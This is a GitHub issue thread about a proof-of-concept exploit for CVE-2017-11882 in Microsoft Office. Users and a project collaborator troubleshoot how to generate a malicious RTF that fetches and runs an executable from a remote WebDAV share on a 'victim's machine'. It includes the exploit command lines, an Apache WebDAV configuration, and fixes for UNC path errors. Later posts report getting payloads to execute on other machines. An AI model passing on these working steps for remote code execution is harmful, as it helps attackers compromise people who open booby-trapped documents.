about exploit #1

backtoback1 opened this issue Nov 20, 2017 · 8 comments
@backtoback1

backtoback1 commented Nov 20, 2017

Hi,
can you please explain how to use this PoC?
I tried many ways and it's not working.
I mean with a real payload, not calc.exe:

python webdav_exec_CVE-2017-11882.py -u http://192.168.1.166/payload.exe -e payload.exe -o test.rtf

but it shows me this error:

Traceback (most recent call last):
File "webdav_exec_CVE-2017-11882.py", line 152, in
rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
File "webdav_exec_CVE-2017-11882.py", line 137, in create_rtf
ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
File "webdav_exec_CVE-2017-11882.py", line 129, in create_ole_exec_primitive
raise ValueError("primitive command must be shorter than 43 bytes")
ValueError: primitive command must be shorter than 43 bytes

Thanks

@isabellah750

isabellah750 commented Nov 21, 2017

Seems like it uses a UNC path; according to my understanding, that is a path to a file shared on the network.

Although I am also interested in downloading the file using HTTP.

@shellerto

shellerto commented Nov 21, 2017

Hi - I can't run this exploit -
I use this command:
python webdav_exec_CVE-2017-11882.py -u \192.168.1.11\ff\sss.exe -e C:\Windows\system32\calc.exe -o test

and the exploit message

but the Word file does not work.

@kkkkkii
Collaborator

kkkkkii commented Nov 21, 2017

Hello!

First of all you will need a properly configured HTTP server with WebDAV support (it's important, obviously) in order to execute an arbitrary binary on the victim's machine. It may be tricky to configure the HTTP server properly. I am using Apache httpd on a CentOS 6 machine. Your setup should support anonymous authentication and file locking. So I have something like this in my httpd.conf:

Alias /dav "/var/www/dav"
<IfModule dav_lock_module>
    DavLockDB "/var/www/dav"
</IfModule>
<Directory "/var/www/dav">
    Header set Access-Control-Allow-Origin "*"
    Dav On
</Directory>

Something may be missing, because now I cannot remember exactly how I configured it.

After you have properly configured the HTTP server, make sure that your WebDAV folder is accessible from the outside and that executable files can be launched from this location, for example with the Win+R shortcut.

WebDAV uses HTTP as transport and can be accessed with a UNC path just like SMB.
That's why you should create the sample exploit file with UNC paths:

python webdav_exec_CVE-2017-11882.py -u \\192.168.1.166\dav -e \\192.168.1.166\dav\1.exe -o test.rtf

In fact, the first UNC path can be just any UNC path which complies with the command length limitation.
It is used to trigger the start of the WebClient service.

If everything is configured right you can launch your binary on the victim's machine. Hope that helps.
I will update README.md ASAP and close this issue.

@kkkkkii kkkkkii self-assigned this Nov 21, 2017
@backtoback1
Author

@kkkkkii

Can you explain that step by step?
I edited the WebDAV and I can access files from another PC,
but with Word it shows me this error:

https://image.prntscr.com/image/fSzsc4ruSCGFv31qxBInPQ.png

@kkkkkii
Collaborator

kkkkkii commented Nov 21, 2017

@backtoback1

According to your screenshot, you missed one leading backslash. This can be caused by your shell environment. Maybe \ is considered a special symbol by the shell where you execute this script. If you can run your payload from the Win+R box with the UNC path \\192.168.1.166\webdav\1.exe, then you can do this with the exploit.

@isabellah750

I am still confused how it is working.

@kalifan

kalifan commented Dec 3, 2017

Hi guys, for some reason the exploit does not work fine; maybe you must use "//" and not "\". I have had this problem.
As seen, when you use Kali Linux the correct way is this:

python webdav_exec_CVE-2017-11882.py -u //192.168.0.100/temp -e //192.168.0.100/temp/1.exe -o example.rtf

Thanks, good job!!

@eternal1502

Hi, so I connected my local PC to my cPanel through Web Disk and, after some trials, I was able to get the exploit to work and execute the payload on my local PC. But when I run the same file on another PC which is not connected to my cPanel Web Disk, it does not download the payload.
